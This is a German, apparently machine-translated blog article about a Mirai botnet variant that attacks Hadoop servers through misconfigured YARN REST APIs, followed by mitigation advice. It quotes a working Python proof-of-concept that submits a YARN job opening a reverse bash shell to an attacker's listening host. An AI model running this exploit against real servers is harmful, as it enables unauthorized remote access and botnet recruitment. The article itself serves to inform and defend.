Außer IoT: Das Mirai-Botnetz hat einen Angriff auf Linux-Computer gestartet

Das Mirai-Botnetz erschien 2016 und konnte in kurzer Zeit mehr als 600.000 IoT-Geräte infizieren . Letzte Woche wurde bekannt über die neue Version von Mirai, deren Zweck Linux-Server mit Hadoop sind. Wir finden heraus, welche Sicherheitsanfälligkeit der Virus nutzt und wie er "abgedeckt" werden kann.


/ Flickr / DJ Shin / CC BY-SA

Ein paar Worte zu Mirai

Mirai wurde bekannt für eine Reihe hochkarätiger Angriffe. Einer war auf dem Blog des Journalisten Brian Krebs, nachdem er einen Artikel über Botnet-Verkäufe veröffentlicht hatte. Der andere ist der große DNS-Anbieter Dyn , der eine Fehlfunktion in den weltweiten Diensten verursacht hat: Twitter, Reddit, PayPal, GitHub und viele andere.

Um IoT-Geräte zu „erfassen“, verwendete das Botnetz eine schwache Kennwortanfälligkeit (die Hersteller haben sie für alle Smart-Geräte gleich gemacht). Die Malware überwachte das Internet auf offene Telnet-Ports und gab die bekannten Login-Passwort-Paare brutal ein, um auf das Konto des Gerätebesitzers zuzugreifen. Bei Erfolg wurde das Gadget Teil des "bösartigen Netzwerks".

Ende 2016 haben Entwickler den Quellcode des Virus im Netzwerk veröffentlicht. Dies führte zur Entstehung mehrerer weiterer Versionen von schädlicher Software, aber alle machten ihr Ziel zum Gerät des Internets der Dinge. Bis vor kurzem ist der Mirai-Wurm aufgetaucht, der Linux-Server in Rechenzentren angreift.

Botnet "rekrutiert" Linux

Der Bericht über die neue Version von Mirai wurde von Informationssicherheitsspezialisten bei NETSCOUT veröffentlicht. Es ist bekannt, dass ein Botnetz Server mit installiertem Apache Hadoop-Framework angreift. Wie Sicherheitsexperten sagen, werden Hacker von der Kraft des Eisens angezogen. Hadoop wird auf Hochleistungs-Computerservern und Algorithmen für maschinelles Lernen verwendet. Ein Netzwerk produktiver Geräte ermöglicht zerstörerischere DDoS-Angriffe.

Die Mirai-Version für Linux hackt immer noch Systeme nach Telnet-Factory-Anmeldeinformationen. Jetzt muss das Programm nicht mehr zwischen verschiedenen Architekturtypen von IoT-Gadgets unterscheiden. Mirai greift nur Server mit x86-Prozessoren an.

Gleichzeitig installiert das neue Botnetz keine Malware auf dem gehackten Gerät. Der Wurm sendet den Angreifern die IP-Adresse des anfälligen Computers sowie ein Paar Benutzername und Kennwort. Anschließend installieren Hacker DDoS-Bots manuell.

Welche Sicherheitslücke wird verwendet?

Die Malware nutzt die Sicherheitsanfälligkeit des YARN-Moduls aus, das für die Verwaltung von Clusterressourcen und die Planung von Aufgaben in Apache Hadoop verantwortlich ist, um den Server zu infiltrieren.

Wenn die YARN-Konfiguration nicht korrekt ist, kann der Angreifer über die Ports 8088 und 8090 auf die interne REST-API des Systems zugreifen. Durch die Remoteverbindung kann der Angreifer dem Cluster eine neue Anwendung hinzufügen. Dieses Problem ist übrigens seit mehreren Jahren bekannt - PoC-Exploits wurden auf ExploitDB und GitHub veröffentlicht .

Der folgende Exploit- Code wird beispielsweise auf GitHub angezeigt:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/' lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 

Neben Mirai wird diese Sicherheitsanfälligkeit von einem anderen DDoS-Bot genutzt - DemonBot, den Radware-Spezialisten im Oktober entdeckt haben. Seit Beginn des Herbstes haben sie täglich über eine Million Hacking-Versuche durch die Sicherheitsanfälligkeit YARN protokolliert.

Was Experten sagen

Laut Experten für Informationssicherheit wurden die meisten Versuche in den USA, Großbritannien, Italien und Deutschland gehackt. Zu Beginn des Monats waren weltweit etwas mehr als tausend Server von Sicherheitslücken in YARN betroffen. Das ist nicht viel, aber alle haben eine hohe Rechenleistung.

Es gibt auch Informationen, dass eine Sicherheitsanfälligkeit in Hadoop Angreifern Zugriff auf Daten gewähren könnte, die auf unsicheren Servern gespeichert sind. Bisher wurden keine derartigen Fälle gemeldet, Experten warnen jedoch davor, dass dies nur eine Frage der Zeit ist.

Die neue Version von Mirai verbreitet sich nicht schnell - jeden Tag gibt es nur einige Zehntausende Versuche, Hadoop-Maschinen durch YARN zu knacken. Darüber hinaus kommen alle Angriffe von einer kleinen Anzahl von IP-Adressen - nicht mehr als vierzig.


/ Flickr / Jelene Morris / CC BY

Ein solches Verhalten von Angreifern veranlasste NETSCOUT-Spezialisten zu der Idee, dass sich der Virus nicht automatisch verbreitet - Hacker scannen das Internet manuell und stellen das Programm auf ungeschützten Computern bereit. Dies bedeutet, dass Besitzer von Servern mit installiertem Hadoop mehr Zeit haben, um die Sicherheitsanfälligkeit zu schließen.

Zum Schutz vor Angriffen müssen Sie die Netzwerksicherheitseinstellungen ändern . Administratoren können den Zugriff auf den Computercluster einschränken, um IP-Filter zu konfigurieren oder das Netzwerk für externe Benutzer und Anwendungen vollständig zu schließen.

Um unbefugten Zugriff auf das System zu verhindern, empfehlen Sicherheitsexperten außerdem, Hadoop auf Version 2.x zu aktualisieren und die Authentifizierung über das Kerberos-Protokoll zu aktivieren.

---

Mehrere Beiträge aus dem VAS Experts Blog:

• Botnet-Spam über Router - was Sie wissen müssen
• IPv6-Implementierung - FAQ für Internetdienstanbieter
• DDOS und 5G: dickeres „Rohr“ - mehr Probleme

Ein paar frische Materialien aus unserem Blog über Habré:

• Wie sie Starlink - Satelliten-Internet von Ilona Mask starten
• So ersetzen Sie TCP: QUIC ist bereit für die Implementierung [aber nicht bereit, RFC zu werden]